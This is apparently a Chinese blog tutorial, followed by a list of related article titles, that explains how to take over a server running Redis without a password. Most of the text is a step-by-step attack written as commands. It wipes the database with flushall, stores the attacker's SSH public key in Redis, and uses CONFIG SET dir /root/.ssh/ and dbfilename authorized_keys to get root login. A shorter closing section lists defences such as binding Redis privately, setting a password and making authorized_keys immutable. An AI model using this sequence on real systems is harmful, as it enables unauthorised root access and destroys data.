通过Redis入侵服务器
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆
步骤:
一、生成本地ssh公钥
ssh-keygen
二、先连接redis看看
telnet 192.168.88.136 6379
redis-cli -h 192.168.88.136
三、清一下redis数据库
redis-cli -h 192.168.88.136 flushall
四、向redis写自己的公钥
cat id_rsa.pub | redis-cli -h 192.168.88.136 -x set redis
五、利用redis写入到文件中
#连接redis
#redis-cli -h 192.168.88.136
#查看keys
192.168.88.136>keys *
#写入配置库的路径及存放位置
192.168.88.136>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
192.168.88.136>CONFIG SET dbfilename "authorized_keys"
#写入
192.168.88.136>save
#退出
192.168.88.136>exit
六、远程连接
ssh root@192.168.88.136
注意,这个是使用的默认的。也就是说别人是用的root来启动的redis 并且没有更改sshd配置文件,以及redis可以默认的可以随意访问性的。
防止redis入侵服务器的措施:
1、不要对外开放redis,也就是不要使用公网ip启动redis
2、更改redis默认的端口(默认是6379)
3、给reids加密码,在启动的以后,我们必须通过密码认证后才能操作
4、给 authorized_keys 文件加上特殊权限(chattr +i authorized_keys),不让别人在里面写内容
5、也可以给/root/.ssh 这个目录加上特殊权限(chattr +i /root/.ssh),这样即使是root用户也不能够在里面写东西
备注:
如果给redis加了密码以后,我们在启动的时候可以这样 redis-cli -h 192.168.88.136 -p 端口 -a 密码,也可以通过先登陆后认证的方式,也就是redis-cli -h 192.168.88.136 -p 端口 ,认证auth 密码
关闭的时候也一样redis-cli -h 192.168.88.136 -p 端口 -a 密码 shutdown
通过Redis入侵服务器相关推荐
- python如何入侵服务器的_通过redis入侵服务器的步骤
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key.然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件. ...
- Linux挖矿病毒排查(通过redis入侵服务器原理)
入侵原理 攻击者通过redis连接服务器在服务器上写入ssh免密登录的公钥 1.生成 ssh 公私钥文件, 写入待发送文件* ssh-keygen -t rsa -C "xxx"* ...
- [ 搭建Redis本地服务器实践系列三 ] :图解Redis客户端工具连接Redis服务器
原文:[ 搭建Redis本地服务器实践系列三 ] :图解Redis客户端工具连接Redis服务器 上一章 [ 搭建Redis本地服务器实践系列二 ] :图解CentOS7配置Redis 介绍了Red ...
- redis多服务器共享_【数据库】Redis(二)持久化及事务
Redis的数据持久化 Redis是基于内存对数据操作的数据库,计算机重启后,内存中的数据就会丢失,所以redis提供了持久化的功能,可以将redis操作的内存中数据持久化到本地的硬盘中.在redis ...
- redis入门——服务器篇
redis入门--服务器篇 @(Redis)[服务器, 配置文件, 发布订阅, 事务] redis入门服务器篇 redis服务器配置文件 redis服务器基本命令 redis服务器的持久化 RDB持久 ...
- 入侵服务器挖矿和诈骗事件频发 | 零时科技区块链安全周报
入侵服务器挖矿和诈骗事件频发 | 零时科技区块链安全周报 据 零时科技 区块链安全威胁情报平台 数据统计,上周整个区块链生态被公开的区块链安全事件共12起.主要攻击类型分为入侵服务器挖矿攻击和诈骗两种 ...
- 云服务器 ECS,RDS,Redis,SLB服务器建站流程
搭建服务器网站,首先要购买一台云服务器,云服务器有很多不同的规格,分别满足不同的需求,你可以根据应用场景,不同业务负载下的性能需求来选购,选购请参考地址,java开发一般选用linux服务器 ECS配 ...
- Redis 多服务器集群搭建
Redis 多服务器集群搭建 近期,想到之前使用的Redis集群测试使用的是单服务器上的伪集群,重温<Redis深度历险-核心原理与应用实践>的案例,觉得还是搭建一下多服务器集群来玩一玩会 ...
- redis跨服务器迁移数据
redis跨服务器迁移数据 在此之前使用看有人用脚本做数库迁移,自己试了下,体验极差,各种问题. 现在发现了好用的方法.使用redis-port 来做,非常简单快捷 前提条件 拥有源redis服务器的 ...
- linux 关闭redis 命令_linux关闭redis命令 redis配置redis的服务器启动和关闭 - Redis - 服务器之家...
linux关闭redis命令 redis配置redis的服务器启动和关闭 发布时间:2017-04-13 来源:服务器之家 # chkconfig: 2345 10 90 # description: ...
最新文章
- Spring配置文件-Bean生命周期配置(init-method方法,destory-method方法)
- python软件如何安装方法_【新手必看】Python软件下载及安装教程
- 首次公开!《阿里计算机视觉技术精选》揭秘前沿落地案例
- VBS操作IE ---(【当不使用IE时】可以使用Chrome插件,自定义JS插件操作浏览器)
- 简单实践GraphEmbedding图嵌入的几种方法
- linux下的多线程,linux下的多线程
- L298N电机驱动模块的简单介绍
- 《乔布斯传》阅读笔记
- tar.gz和tar.bz2解压命令
- 问题记录-Access数据库运行查询语句需要输入参数
- 网络靶场攻防综合实验
- android设备登录是什么手机_Android手机丢失或被盗?现在就告诉你如何找回它
- jquery.seat-chartsMark在线选座插件使用
- 人工智能与算法学习总结报告!(珍藏版)
- 百度首页HTML(简单代码)
- Django+bootstrap启动登录模板页面(Django第三篇)
- 本地电脑连接windows云服务器
- 美妆科技:改变美容行业的未来
- Sass系统技术选型笔记(2)JBPM
- kubectl命令使用滚动更新和回滚
热门文章
- 32. Make Sure public inheritance models is-a.
- 解除宝塔面板强制绑定手机号教程
- 陶哲轩实分析(上)8.2及习题-Analysis I 8.2
- 求助文,缺少stubs-n32_hard.h
- ARCGIS坐标和CAD坐标显示,以及坐标之间的转换
- 微信跳一跳小游戏使用charles抓包工具改分攻略
- passing '' as 'this' argument discards qualifiers [-fpermissive]
- 腾讯云服务器价格明细表(CPU内存/带宽/磁盘)
- 【微信支付】微信支付之 Native 支付
- 一文搞懂 RabbitMQ 延时队列(订单定时取消为例)